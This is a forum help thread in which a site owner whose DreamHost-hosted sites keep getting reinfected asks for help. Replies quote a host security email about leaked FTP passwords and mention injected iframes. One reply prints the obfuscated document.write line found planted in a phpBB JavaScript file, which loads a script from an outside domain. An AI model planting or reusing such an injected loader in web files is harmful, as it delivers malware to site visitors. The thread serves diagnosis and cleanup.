• 0

DreamHost Site Hacked


Question

Some of my sites were recently listed by Google as having malicious content, I re-uploaded the files from my PC and all seemed fine, but a few days ago I got another message that three different sites had been listed. Sure enough, when I visited http://forums.lime49.com, I was prompted to download an ActiveX control which I have no knowledge of. The sites are hosted on DreamHost, and clearing the cache on the forums seems to work, but a day or so later it's become re-infected.

The forum runs PHPBB 3.0.5 linked to MediaWiki. I also run MovableType 4.23 and WordPress 2.85 on two different domains. I rely on these sites for my livelihood and am desparate to sort this problem out.

The generic tips (delete suspicious files etc) are quite hard to apply as I have about 10 domains on DreamHost with hundreds of directories. I don't know where to start.

Link to comment
https://www.neowin.net/forum/topic/842752-dreamhost-site-hacked/
Share on other sites

13 answers to this question

Recommended Posts

  • 0

Seeing as I can't edit. Here is some more information about why you may of got hacked:

http://www.caydel.com/dreamhost-leaks-3500-ftp-passwords/

Kinda **** huh

From: DreamHost Security Team

Subject: URGENT: FTP Account Security Concerns?

Hello -

This email is regarding a potential security concern related to your

?XXXX? FTP account.

We have detected what appears to be the exploit of a number of

accounts belonging to DreamHost customers, and it appears that your

account was one of those affected.

We?re still working to determine how this occurred, but it appears

that a 3rd party found a way to obtain the password information

associated with approximately 3,500 separate FTP accounts and has

used that information to append data to the index files of customer

sites using automated scripts (primarily for search engine

optimization purposes).

Our records indicate that only roughly 20% of the accounts accessed -

less than 0.15% of the total accounts that we host - actually had

any changes made to them. Most accounts were untouched.

We ask that you do the following as soon as possible:

1. Immediately change your FTP password, as well as that of any other

accounts that may share the same password. We recommend the use of

passwords containing 8 or more random letters and numbers. You may

change your FTP password from the web panel (?Users? section, ?Manage

Users? sub-section).

2. Review your hosted accounts/sites and ensure that nothing has been

uploaded or changed that you did not do yourself. Many of the

unauthorized logins did not result in changes at all (the intruder

logged in, obtained a directory listing and quickly logged back out)

but to be sure you should carefully review the full contents of your

account.

Again, only about 20% of the exploited accounts showed any

modifications, and of those the only known changes have been to site

index documents (ie. ?index.php?, ?index.html?, etc - though we

recommend looking for other changes as well).

It appears that the same intruder also attempted to gain direct

access to our internal customer information database, but this was

thwarted by protections we have in place to prevent such access.

Similarly, we have seen no indication that the intruder accessed

other customer account services such as email or MySQL databases.

In the last 24 hours we have made numerous significant behind-the-

scenes changes to improve internal security, including the discovery

and patching to prevent a handful of possible exploits.

We will, of course, continue to investigate the source of this

particular security breach and keep customers apprised of what we

find. Once we learn more, we will be sure to post updates as they

become available to our status weblog:

  • 0
The warning says http://forums.lime49.com is serving content from google-query.com, but I can't find any reference to it. A search for google-query.com site:lime49.com returns no hits either. How would I find where this is coming from?

Found it in the following file on your server:

http://forums.lime49.com/styles/brushed_me...ate/forum_fn.js

document.write(unescape("%3Cscript src='http://www.google-query.com/ga.php' type='text/javascript'%3E%3C/script%3E"));

Edited by Guest
  • 0
I had the same problem. All my index.php files got infected. Injected with an iframe to load a malicous site.

Same with one of my friend's sites which is hosted as a sub-domain under my site. Might be trojan/virus/malware related (recently read about a trojan that will steal FTP passwords and infect website files). My sites haven't been infected though and I use Dreamhost.

This topic is now closed to further replies.
  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Posts

    • If you can't spell a simple word that 2nd graders learn, your entire argument is suspect.
    • And here goes the "Won't someone think of the children" brigade. Get stuffed mate. This has NOTHING to do with making the internet safe. It's about tracking adults, spying on your online activity, and sending the boys around when they don't like something you post. Also, again, parliament have voted TWICE against this, and Starmer is going ahead anyway. THAT is anti-democratic bullsh**. They will use this law to track you, they will use this law to control you, and they will use this law to punish you if they don't like what you do, even if it's legal. And your data? Say bye bye to that. It'll be on the darkweb in weeks. I'm not some rando online. I've been an IT professional for 40 years, many of it in security. I know exactly what this means and what will happen to your data. I do not consent and I will not comply.
    • "...but it may not be Microsoft's fault" seems like a reasonable way to tease what is going on without leaving the user with a false impression that an update is the problem. A title isn't a summery, it is meant to entice the user to read the article. It should not contain a misleading premise; which this title does not. You could maybe complain that the first paragraph should have included that detail. The writing style popularized over 100 years ago in newspapers will cover the most important information as soon as possible with details and nuance added later; the idea being that with each new paragraph you have less of the reader's focus.
    • Samsung Galaxy XR arrives in the UK with new AI and enterprise features by Fiza Ali Samsung is bringing its Galaxy XR headset to the UK several months after the device made its debut as the first headset built on Google's Android XR platform. The headset was first teased in late 2024 alongside Google's introduction of Android XR before making its commercial debut in 2025. Developed in collaboration with Google and Qualcomm, Galaxy XR combines mixed reality experiences with Gemini-powered AI features, allowing users to interact with digital content using voice, gestures, and visual inputs. While the hardware itself remains largely unchanged from the version Samsung unveiled last year, the company is using the UK launch to spotlight several software enhancements that have arrived through recent updates. Among the most notable additions is deeper integration with Google's ecosystem. Galaxy XR users can explore destinations through Google Maps' Immersive View, receiving AI-powered recommendations and contextual information from Gemini while navigating virtual environments. Furthermore, entertainment experiences have also expanded; users can watch 180-degree and 360-degree videos on YouTube, browse spatial content converted into 3D, and ask Gemini questions about on-screen content without interrupting playback. Samsung is also highlighting mixed-reality features such as Circle to Search, which allows users to identify real-world objects through hand gestures while using the headset's video pass-through mode. Another feature automatically converts photos and videos into spatial 3D experiences. Moreover, the headset now also supports Android Enterprise, allowing organisations to manage deployments using existing Android management tools. Annika Bizon, Vice President, Product and Marketing, Mobile Experience, Samsung UK & Ireland, talked about the device, stating: The headset is powered by Qualcomm's Snapdragon XR2+ Gen 2 platform and features dual 4K Micro-OLED displays. The tech giant says that users can expect up to 2.5 hours of battery life. Samsung also confirmed that Galaxy XR will continue receiving software and security updates as the company works alongside Google and Qualcomm to expand the Android XR ecosystem. Galaxy XR is now available for pre-order and will go on sale on 8 July. Customers interested in trying the headset before launch can visit Samsung KX in London and selected Samsung Experience Stores from 17 June. Finally, the company will also host a livestream on 19 June showcasing the headset's capabilities and answering questions from prospective customers.
  • Recent Achievements

    • First Post
      Jocimo earned a badge
      First Post
    • Week One Done
      suprememobiles48 earned a badge
      Week One Done
    • One Month Later
      Windows Guy earned a badge
      One Month Later
    • One Month Later
      Prasann earned a badge
      One Month Later
    • Week One Done
      Prasann earned a badge
      Week One Done
  • Popular Contributors

    1. 1
      +primortal
      519
    2. 2
      +Edouard
      174
    3. 3
      PsYcHoKiLLa
      95
    4. 4
      Steven P.
      84
    5. 5
      ATLien_0
      70
  • Tell a friend

    Love Neowin? Tell a friend!